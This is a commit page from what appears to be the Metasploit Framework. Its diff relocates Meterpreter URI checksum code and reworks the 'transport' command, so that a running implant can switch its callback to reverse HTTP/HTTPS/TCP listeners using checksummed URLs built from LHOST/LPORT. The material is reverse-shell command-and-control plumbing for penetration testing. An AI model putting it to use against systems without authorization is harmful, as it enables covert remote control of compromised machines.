Skip to content

Commit c0f4961

Browse files
committed
Rejig code to support http payloads
* Move the uri checksum code to a spot that can be shared with rex. * Adjust modules to make use of this new location. * Fix up the tranpsort switcher to add the URI for those payloads.
1 parent 1f00b59 commit c0f4961

File tree

5 files changed

+38
-23
lines changed

5 files changed

+38
-23
lines changed

lib/msf/core/handler/reverse_http.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,8 +1,8 @@
11
# -*- coding: binary -*-
22
require 'rex/io/stream_abstraction'
33
require 'rex/sync/ref'
4-
require 'msf/core/handler/reverse_http/uri_checksum'
54
require 'rex/payloads/meterpreter/patch'
5+
require 'rex/payloads/meterpreter/uri_checksum'
66
require 'rex/parser/x509_certificate'
77
require 'msf/core/payload/windows/verify_ssl'
88

@@ -17,7 +17,7 @@ module Handler
1717
module ReverseHttp
1818

1919
include Msf::Handler
20-
include Msf::Handler::ReverseHttp::UriChecksum
20+
include Rex::Payloads::Meterpreter::UriChecksum
2121
include Msf::Payload::Windows::VerifySsl
2222

2323
#

lib/msf/core/handler/reverse_http/uri_checksum.rb renamed to lib/rex/payloads/meterpreter/uri_checksum.rb

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
# -*- coding: binary -*-
2-
module Msf
3-
module Handler
4-
module ReverseHttp
2+
module Rex
3+
module Payloads
4+
module Meterpreter
55
module UriChecksum
66

77
#

lib/rex/post/meterpreter/client_core.rb

Lines changed: 14 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -11,6 +11,12 @@
1111
# Provides methods to patch options into the metsrv stager.
1212
require 'rex/payloads/meterpreter/patch'
1313

14+
# URI checksum calculation
15+
require 'rex/payloads/meterpreter/uri_checksum'
16+
17+
# URI checksumming stuff
18+
require 'msf/core/handler/reverse_https'
19+
1420
module Rex
1521
module Post
1622
module Meterpreter
@@ -28,6 +34,8 @@ class ClientCore < Extension
2834
UNIX_PATH_MAX = 108
2935
DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
3036

37+
include Rex::Payloads::Meterpreter::UriChecksum
38+
3139
#
3240
# Initializes the 'core' portion of the meterpreter client commands.
3341
#
@@ -226,14 +234,17 @@ def change_transport(opts={})
226234
request = Packet.create_request('core_change_transport')
227235

228236
url = "#{opts[:scheme]}://#{opts[:lhost]}:#{opts[:lport]}"
229-
url << '/' + opts[:suffix] if opts[:suffix]
237+
238+
if opts[:adduri]
239+
checksum = generate_uri_checksum(URI_CHECKSUM_CONN)
240+
rand = Rex::Text.rand_text_alphanumeric(16)
241+
url << "/#{checksum}_#{rand}/"
242+
end
230243

231244
request.add_tlv(TLV_TYPE_TRANSPORT_TYPE, opts[:type])
232245
request.add_tlv(TLV_TYPE_TRANSPORT_URL, url)
233246

234247
response = client.send_request(request)
235-
236-
# TODO: shut this baby down.
237248
end
238249

239250
#

lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb

Lines changed: 18 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -18,6 +18,18 @@ class Console::CommandDispatcher::Core
1818

1919
include Console::CommandDispatcher
2020

21+
METERPRETER_TRANSPORT_SSL = 0
22+
METERPRETER_TRANSPORT_HTTP = 1
23+
METERPRETER_TRANSPORT_HTTPS = 2
24+
25+
VALID_TRANSPORTS = {
26+
'reverse_tcp' => METERPRETER_TRANSPORT_SSL,
27+
'reverse_http' => METERPRETER_TRANSPORT_HTTP,
28+
'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
29+
'bind_tcp' => METERPRETER_TRANSPORT_SSL
30+
}
31+
32+
2133
#
2234
# Initializes an instance of the core command set using the supplied shell
2335
# for interactivity.
@@ -327,11 +339,8 @@ def cmd_transport(*args)
327339
return true
328340
end
329341

330-
# the order of these is important (hacky!)
331-
valid_transports = ['reverse_tcp', 'reverse_http', 'reverse_https', 'bind_tcp']
332-
333342
transport = args.shift.downcase
334-
unless valid_transports.include?(transport)
343+
unless VALID_TRANSPORTS.has_key?(transport)
335344
#cmd_transport_help
336345
end
337346

@@ -342,30 +351,25 @@ def cmd_transport(*args)
342351

343352
lhost = ""
344353
lport = args.shift.to_i
345-
type = 0
346354
else
347355
unless args.length == 2
348356
#cmd_transport_help
349357
end
350358

351359
lhost = args.shift
352360
lport = args.shift.to_i
353-
type = valid_transports.index(transport)
354-
end
355-
356-
suffix = nil
357-
unless transport.ends_with?("tcp")
358-
suffix = "some magic URL"
359361
end
360362

363+
print_status("Swapping transport ...")
361364
client.core.change_transport({
362-
:type => type,
365+
:type => VALID_TRANSPORTS[transport],
363366
:scheme => transport.split('_')[1],
364367
:lhost => lhost,
365368
:lport => lport,
366-
:suffix => suffix
369+
:adduri => !transport.ends_with?('tcp')
367370
})
368-
371+
client.shutdown_passive_dispatcher
372+
shell.stop
369373
end
370374

371375
def cmd_migrate_help

modules/payloads/singles/windows/meterpreter_reverse_https.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -37,7 +37,7 @@ def initialize(info = {})
3737
end
3838

3939
def generate
40-
checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
40+
checksum = generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN)
4141
rand = Rex::Text.rand_text_alphanumeric(16)
4242
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
4343

0 commit comments

Comments
 (0)